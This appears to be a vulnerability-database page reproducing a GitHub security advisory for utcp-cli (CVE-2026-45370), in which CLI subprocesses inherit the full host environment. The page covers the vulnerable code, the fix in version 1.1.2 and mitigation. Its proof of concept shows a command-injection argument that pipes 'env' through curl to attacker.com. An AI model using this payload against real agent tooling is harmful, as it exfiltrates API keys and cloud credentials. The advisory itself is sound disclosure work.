What is GHSA-5v57-8rxj-3p2r?

GHSA-5v57-8rxj-3p2r is a security advisory published by GitHub Security Advisories with High severity. python-utcp: Full Process Environment Exposed to CLI Subprocess - Secrets Leakage via Command Injection

Which CVE IDs does GHSA-5v57-8rxj-3p2r cover?

GHSA-5v57-8rxj-3p2r covers the following CVE IDs: CVE-2026-45370. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-5v57-8rxj-3p2r?

GHSA-5v57-8rxj-3p2r has a CVSS v3 base score of 7.7, published by GitHub Security Advisories.

Which products are affected by GHSA-5v57-8rxj-3p2r?

GHSA-5v57-8rxj-3p2r affects 1 product, including: pip/utcp-cli:\u003c= 1.1.1.

GHSA-5v57-8rxj-3p2rHighCVSS 7.7

python-utcp: Full Process Environment Exposed to CLI Subprocess - Secrets Leakage via Command Injection

Vendor

GitHub Security Advisories

Published

May 14, 2026

Last Modified

May 15, 2026

🔗 CVE IDs covered (1)

CVE-2026-45370 →

📋 Description

## Summary `_prepare_environment()` in `cli_communication_protocol.py` passes a full copy of `os.environ` to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in `_substitute_utcp_args()` tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call. ## Vulnerable Code ```python # cli_communication_protocol.py def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]: env = os.environ.copy() # All secrets inherited if provider.env_vars: env.update(provider.env_vars) return env ``` ## Impact Any environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes: - Cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET) - Database connection strings (DATABASE_URL) - LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY) - Internal service tokens ## Proof of Concept ```python # Tool defined as: {"command": "grep UTCP_ARG_pattern_UTCP_END logfile.txt"} # Attacker supplies: tool_args = {"pattern": "x; env | curl -s -d @- https://attacker.com"} # Executed bash script: # CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2>&1) # -> Full env dump sent to attacker including all secrets ``` ## Patched Fixed in `utcp-cli` 1.1.2. `_prepare_environment` no longer copies the full host environment. Inheritance is controlled by a new `CliCallTemplate.inherit_env_vars` field: - `null` (default): a small built-in OS-specific allowlist (`PATH`, `HOME`, `LANG` on Unix; `PATH`, `PATHEXT`, `SYSTEMROOT`, `USERPROFILE`, etc. on Windows) is inherited so shells and binaries continue to work. - `[]`: strict mode -- nothing from the host environment reaches the subprocess; only `env_vars` is propagated. - `["FOO", "BAR"]`: exactly those host variables are inherited (replaces, not merges with, the default allowlist). `env_vars` is always layered on top and overrides any inherited value. Secrets like `OPENAI_API_KEY` no longer reach the subprocess unless the call template explicitly opts them in. ## Mitigation Upgrade to `utcp-cli >= 1.1.2`. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call. ## Credit Reported by @ZeroXJacks.

🎯 Affected products1

pip/utcp-cli:<= 1.1.1

🔗 CVE IDs covered (1)

📋 Description

🎯 Affected products1

🔗 References (3)